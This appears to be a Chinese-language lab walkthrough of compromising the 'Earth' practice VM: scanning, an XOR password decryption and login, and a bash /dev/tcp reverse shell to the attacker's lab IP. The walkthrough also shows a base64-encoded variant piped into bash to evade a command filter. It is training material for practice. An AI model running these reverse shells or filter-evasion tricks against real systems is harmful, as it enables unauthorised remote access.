一.環境準備
1.1Earth靶機環境準備
首先將我們解壓好的的Earth.ova放入虛擬機里,并配置環境
將網絡連接換成NET連接
二.信息搜集
2.1ip搜集
2.1.1使用netdiscover命令掃描靶機的ip地址,發現地址為192.168.182.137
2.2端口掃描
2.2.1使用nmap工具對目標機進行端口掃描,發現開啟21了端口,且發現有Dns,80端口無法訪問,因此需要修改hosts配置文件,
sudo vim /etc/hosts
2.3目錄掃描
2.3.1使用kali的dirb進行目錄掃描,使用dirb掃描這兩個不同的域名,以及443https服務下的域名,發現四個結果幾乎都是這樣,只有https的terratest結果不一樣
2.3.2訪問https://terratest.earth.local/robots.txt,發現以下文件,且最后面有一個testingnotes.*就是什么后綴名都可以,但是notes明顯應該是txt后綴2.
2.3.3訪問testingnotes.txt,正常訪問訪問不到,使用該url訪問,https://terratest.earth.local//testingnotes.txt,
內容如圖
2.3.4打開后我們拿到了一個用戶名 terra,并且這里告訴了我們一個加密方式是利用XOR異或方式加密的,testdata.txt其實就是我們的密鑰,而密文就是我們主頁面最下面這一串16進制的數字,我們可以看出來這里面最大的數就是F,所以肯定是一個16進制的數字
三.漏洞利用
3.1解密,登錄
3.1.1用 python 腳本去解密,獲得key,仔細看不難發現都是圍著這個來循環的
key:
3.1.2前往登錄頁面登錄
賬號: terra
密碼:
earthclimatechangebad4humans
四.開啟監聽并觸發反彈shell
4.1
4.1.1發現這是一個命令執行頁面,看可不可以將木馬寫入里面,不行,嘗試使用反彈shell
finalshell監聽66端口:
4.1.2嘗試反彈shell:bash -c 'exec bash -i &>/dev/tcp/192.168.182.130/66 <&1' 被禁止
使用base64編碼,使用這個命令查看base64加密后的結果:
將剛才加密的密文進行解密,在剛才界面去執行這段代碼
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTgyLjEzMC82NiA8JjEK | base64 -d | bash
4.1.3執行命令
earth靶機練習到此結束
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 2025.7.26 18:55